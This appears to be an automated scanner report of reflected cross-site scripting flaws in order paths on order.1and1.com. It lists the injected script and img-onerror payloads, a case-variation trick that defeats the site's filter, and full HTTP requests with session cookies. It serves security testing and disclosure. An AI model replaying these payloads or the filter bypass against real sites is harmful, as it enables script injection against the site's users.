Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureDatabaseDatabase is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureDatabaseDatabase. The payload 9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0 was submitted in the REST URL parameter 3. This input was returned as 9ead5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>428693372d0 in a subsequent request for the URL /xml/order/FeatureDatabaseDatabase.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureDatabaseDatabase9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureDatabaseDatabase;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailEmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailEmail. The payload f6a45</ScRiPt%20>ca9d9974f55 was submitted in the REST URL parameter 3. This input was returned as f6a45</ScRiPt >ca9d9974f55 in a subsequent request for the URL /xml/order/FeatureEmailEmail.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureEmailEmailf6a45</ScRiPt%20>ca9d9974f55;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureEmailEmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailWebmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailWebmail. The payload 45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 was submitted in the REST URL parameter 3. This input was returned as 45663</ScRiPt ><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 in a subsequent request for the URL /xml/order/FeatureEmailWebmail.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureEmailWebmail45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureEmailWebmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureGuaranteeMoneyback is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureGuaranteeMoneyback. The payload 83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d was submitted in the REST URL parameter 3. This input was returned as 83c9e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>eed4e62047d in a subsequent request for the URL /xml/order/FeatureGuaranteeMoneyback.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureGuaranteeMoneyback83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureGuaranteeMoneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureMarketingCtrCitysearch is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureMarketingCtrCitysearch. The payload 649d3</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>b5a1ad5a333 was submitted in the REST URL parameter 3. This input was returned as 649d3</ScRiPt ><img src=a onerror=alert(1)>b5a1ad5a333 in a subsequent request for the URL /xml/order/FeatureMarketingCtrCitysearch.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureMarketingCtrCitysearch649d3</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>b5a1ad5a333;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureMarketingCtrCitysearch;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureMarketingCtrStat is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureMarketingCtrStat. The payload ccb50</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>3147a128d82 was submitted in the REST URL parameter 3. This input was returned as ccb50</ScRiPt ><img src=a onerror=alert(1)>3147a128d82 in a subsequent request for the URL /xml/order/FeatureMarketingCtrStat.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureMarketingCtrStatccb50</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>3147a128d82;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureMarketingCtrStat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingCgi is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingCgi. The payload 31b1b</ScRiPt%20>c2edeb9151d was submitted in the REST URL parameter 3. This input was returned as 31b1b</ScRiPt >c2edeb9151d in a subsequent request for the URL /xml/order/FeatureSite-buildingCgi.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureSite-buildingCgi31b1b</ScRiPt%20>c2edeb9151d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingCgi;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingDsc is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingDsc. The payload 5a570</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>5c34db446ac was submitted in the REST URL parameter 3. This input was returned as 5a570</ScRiPt ><ScRiPt>alert(1)</ScRiPt>5c34db446ac in a subsequent request for the URL /xml/order/FeatureSite-buildingDsc.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/FeatureSite-buildingDsc5a570</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>5c34db446ac;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingDsc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
